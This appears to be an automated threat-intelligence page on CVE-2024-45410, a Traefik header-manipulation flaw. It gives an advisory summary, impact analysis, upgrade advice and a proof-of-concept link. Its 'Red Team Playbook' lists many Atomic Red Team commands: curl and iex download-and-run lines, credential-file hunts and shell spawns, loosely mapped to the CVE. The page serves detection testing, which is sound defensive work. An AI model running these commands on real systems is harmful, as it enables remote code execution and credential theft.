CVE-2024-45410
Overview
This vulnerability is an HTTP header manipulation flaw affecting Traefik's HTTP/1.1 request processing. The root cause lies in Traefik's handling of hop-by-hop headers via the HTTP Connection header, which allows an attacker to remove or modify headers such as X-Forwarded-Host and X-Forwarded-Port that are normally added and trusted by Traefik before forwarding requests to backend applications. The affected component is Traefik's HTTP header parsing and forwarding logic within its proxy functionality.
Vulnerability Description
Traefik is a golang, Cloud Native Application Proxy. When a HTTP request is processed by Traefik, certain HTTP headers such as X-Forwarded-Host or X-Forwarded-Port are added by Traefik before the request is routed to the application. For a HTTP client, it should not be possible to remove or modify these headers. Since the application trusts the value of these headers, security implications might arise, if they can be modified. For HTTP/1.1, however, it was found that some of theses custom headers can indeed be removed and in certain cases manipulated. The attack relies on the HTTP/1.1 behavior, that headers can be defined as hop-by-hop via the HTTP Connection header. This issue has been addressed in release versions 2.11.9 and 3.1.3. Users are advised to upgrade. There are no known workarounds for this vulnerability.
Impact
An unauthenticated remote attacker can manipulate or remove trusted HTTP headers that Traefik injects, potentially causing backend applications to process falsified client information. This can lead to unauthorized access, request forgery, or bypass of security controls relying on these headers. The attack requires network access to Traefik's HTTP/1.1 interface and no user interaction or privileges. Given the CVSS vector (AV:N/AC:L/PR:N/UI:N), exploitation is straightforward and can compromise confidentiality, integrity, and availability of backend services.
Solution
Users must upgrade Traefik to version 2.11.9 or later, or 3.1.3 or later, where this header manipulation issue is resolved. No known workarounds exist. Detailed patch and upgrade instructions are provided in the official Traefik security advisory at https://github.com/traefik/traefik/security/advisories/GHSA-62c8-mh53-4cqv and corresponding release notes at https://github.com/traefik/traefik/releases/tag/v2.11.9 and https://github.com/traefik/traefik/releases/tag/v3.1.3.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Traefik, a widely used cloud-native application proxy, arises from the improper handling of certain HTTP headers, specifically the X-Forwarded-Host and X-Forwarded-Port headers. In a typical scenario, these headers are added by Traefik to facilitate the routing of HTTP requests to the appropriate backend applications. However, due to the nature of HTTP/1.1, it has been discovered that these headers can be manipulated or removed by an attacker. This occurs because the HTTP Connection header allows for the definition of hop-by-hop headers, which can be exploited to alter the intended routing behavior. Consequently, this vulnerability exposes applications relying on these headers to potential spoofing and redirection attacks, undermining the integrity of the request handling process.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could craft a malicious HTTP request that either omits or modifies the X-Forwarded-Host or X-Forwarded-Port headers. By doing so, they could redirect traffic to an unintended destination or impersonate a legitimate service. For instance, if an application trusts the values of these headers for authentication or authorization purposes, an attacker could gain unauthorized access or perform actions on behalf of legitimate users. This manipulation could also lead to data breaches, where sensitive information is exposed or misrouted to malicious endpoints, thereby compromising the confidentiality and integrity of the data.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on Traefik for routing traffic in microservices architectures. Businesses that utilize this application proxy may face severe repercussions if exploited, including financial losses, reputational damage, and legal liabilities stemming from data breaches. The risk is amplified in environments where sensitive data is processed, such as e-commerce platforms or healthcare applications, where unauthorized access could lead to regulatory violations and loss of customer trust. Additionally, the potential for widespread exploitation increases the urgency for organizations to address this vulnerability promptly.
To detect and mitigate the risks associated with this vulnerability, organizations should adopt a multi-faceted approach. First and foremost, upgrading to the patched versions of Traefik (2.11.9 and 3.1.3) is essential to eliminate the underlying issue. Regular vulnerability assessments and penetration testing should also be conducted to identify any instances of exploitation or misconfiguration in the application environment. Furthermore, implementing strict input validation and sanitization measures can help mitigate the risks associated with header manipulation. Organizations should also consider employing Web Application Firewalls (WAFs) to monitor and filter incoming traffic for suspicious patterns that may indicate an attempt to exploit this vulnerability.
In conclusion, the vulnerability in Traefik represents a critical security concern for organizations leveraging this application proxy. The ability to manipulate HTTP headers poses a significant threat to the integrity and security of web applications, potentially leading to severe business risks. By promptly upgrading to the latest versions and implementing robust detection and mitigation strategies, organizations can protect themselves against the exploitation of this vulnerability and safeguard their sensitive data.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2024-45410, accompanied by the emergence of a new publicly available proof-of-concept exploit hosted on GitHub. This development signals increased adversary interest and capability to leverage the vulnerability in Traefik’s HTTP header processing. The sharp rise in detection activity across our telemetry indicates that threat actors are actively probing and potentially weaponizing this flaw, elevating the operational risk for organizations relying on affected versions of Traefik. Although the EPSS score remains stable, the combination of heightened exploitation attempts and accessible exploit code significantly amplifies the likelihood of successful attacks. Consequently, defenders should regard the threat level as elevated, reflecting a transition from theoretical risk to active exploitation in the wild.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Traefik | Traefik | All |
cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*
|
|
|
Traefik | Traefik | All |
cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
jphetphoumy/traefik-CVE-2024-45410-poc
A proof of concept of traefik CVE to understand the impact
|
jphetphoumy | 5 | 1 | 2024-09-26 | View |
Threat Feed
2 eventsSighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-45410 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/traefik/traefik/security/advisories/GHSA-62c8-mh53-4cqv |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/traefik/traefik/releases/tag/v2.11.9 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/traefik/traefik/releases/tag/v3.1.3 |